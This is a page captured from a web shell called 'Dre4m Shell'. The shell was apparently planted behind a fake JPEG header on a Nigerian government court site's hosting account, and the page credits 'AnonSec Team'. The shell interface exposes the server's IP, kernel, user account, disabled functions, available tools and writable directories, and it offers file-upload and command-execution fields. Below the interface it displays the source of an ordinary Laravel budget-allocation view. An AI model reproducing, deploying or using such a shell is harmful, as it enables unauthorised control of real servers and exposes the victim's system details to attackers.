ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.117.7.42
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/storage/framework/views/6e27b96b76dc05554e661d417b2ba77bbcfd59df.php
<?php $__env->startSection('pageTitle'); ?>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
<div class="box box-default" style= "border:none;">
        <div class="box-header with-border hidden-print">
          <h3 class="box-title"><?php echo $__env->yieldContent('pageTitle'); ?> <span id='processing'></span></h3>
        </div>
        <?php if($warning<>''): ?>
	<div class="alert alert-dismissible alert-danger">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($warning); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if($success<>''): ?>
	<div class="alert alert-dismissible alert-success">
	<button type="button" class="close" data-dismiss="alert">&times;</button>
	<strong><?php echo e($success); ?></strong> 
	</div>
	<?php endif; ?>
	<?php if(session('message')): ?>
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> 
			<?php echo e(session('message')); ?>

		   </div>                        
                <?php endif; ?>
	<?php if(count($errors) > 0): ?>
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <p><?php echo e($error); ?></p>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </div>
                <?php endif; ?>
                
                <div class="box-body">
 
 <?php echo $__env->make('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'Monthly Allocation Recieved', 'title2'=>'', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>0, 'hideLogos'=>0, 'hideAddress'=>0], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?>
 
	<form method="post"  id="thisform1" name="thisform1" >
		<?php echo e(csrf_field()); ?>

		<div class="box-body">
			<div class="row hidden-print">
        		<div class="col-md-2">          
                    <label class="control-label">Budget Type</label>
                    <?php if (old('economicGroup') !='') {$economicGroup=old('economicGroup'); } ?>
                    <select class="form-control" id="economicGroup" name="economicGroup" onchange="ReloadForm()" required="">
                        <option value=""  >Choose One</option>     
                        <?php $__currentLoopData = $EconomicGroup; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <option value="<?php echo e($list->ID); ?>" <?php echo e(($economicGroup) == $list->ID? "selected":""); ?>><?php echo e($list->contractType); ?></option>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </select>
                </div>
        	<div class="col-md-5">          
                    <label class="control-label">Fund Source</label>
                    <?php if (old('economicsource') !='') {$economicsource=old('economicsource'); } ?>
                    <select class="form-control" id="economicsource" name="economicsource">
                        <option value=""  >Choose One</option>     
                        <?php $__currentLoopData = $EconomicCode; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <option value="<?php echo e($list->ID); ?>" <?php echo e(($economicsource) == $list->ID? "selected":""); ?>><?php echo e($list->economicCode); ?>:<?php echo e($list->description); ?>(<?php echo e(number_format($list->AvailBal,2)); ?>)</option>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </select>
                </div>
                <div class="col-md-5">          
                    <label class="control-label">Fund Destination</label>
                    <?php if (old('economicdest') !='') {$economicdest=old('economicdest'); } ?>
                    <select class="form-control" id="economicdest" name="economicdest" >
                        <option value=""  >Choose One</option>     
                        <?php $__currentLoopData = $EconomicCode; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $list): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                        <option value="<?php echo e($list->ID); ?>" <?php echo e(($economicdest) == $list->ID? "selected":""); ?>><?php echo e($list->economicCode); ?>:<?php echo e($list->description); ?>(<?php echo e(number_format($list->AvailBal,2)); ?>)</option>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                    </select>
                </div>
            		 
					        		
	        </div>
	            	 
    		<div class="row">
    		    <div class="col-md-3">
                	<label>Amount</label>
    				<input type="text"  name="amount"  class="form-control"  value="<?php echo e($amount); ?>" placeholder="">
            	</div>
            	<div class="col-md-4">
    		        <label>Remarks</label>
    				<textarea  name="remarks"   class="form-control" > </textarea>						
			    </div>
				<div class="col-md-2">
    				<br>
    				<button type="submit" class="btn btn-success" name="update">
    					<i class="fa fa-btn fa-floppy-o"></i> Save
    				</button>						
				</div> 
    		</div>
		<input id ="delcode" type="hidden"  name="delcode" >
		</div>
		
	</form>
	
</div>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('styles'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<?php $__env->stopSection(); ?>

<?php $__env->startSection('scripts'); ?>
<link rel="stylesheet" type="text/css" href="<?php echo e(asset('assets/css/datepicker.min.css')); ?>">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/jquery.dataTables.min.css">
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/buttons/1.5.2/css/buttons.dataTables.min.css">

<style>

.table tr th
{
text-transform:uppercase;
font-size: 14px;
}
.table tr td
{
font-size: 14px;
}

</style>

<script src="<?php echo e(asset('assets/js/jquery-ui.min.js')); ?>"></script>

<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/dataTables.buttons.min.js"></script>
<script src="https://cdn.datatables.net/buttons/1.5.2/js/buttons.print.min.js"></script>

<script>
$('.print').click(function()
{
window.print();
});
</script>
  <script type="text/javascript">
	function  ReloadForm()
	{
	document.getElementById('thisform1').submit();
	return;
	}
	
  
  </script>
  
<?php $__env->stopSection(); ?>

<?php echo $__env->make('layouts.layout', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/nicngo5/grp.nicn.gov.ng/resources/views/allocation/lendingborrow.blade.php ENDPATH**/ ?>

Anon7 - 2022
AnonSec Team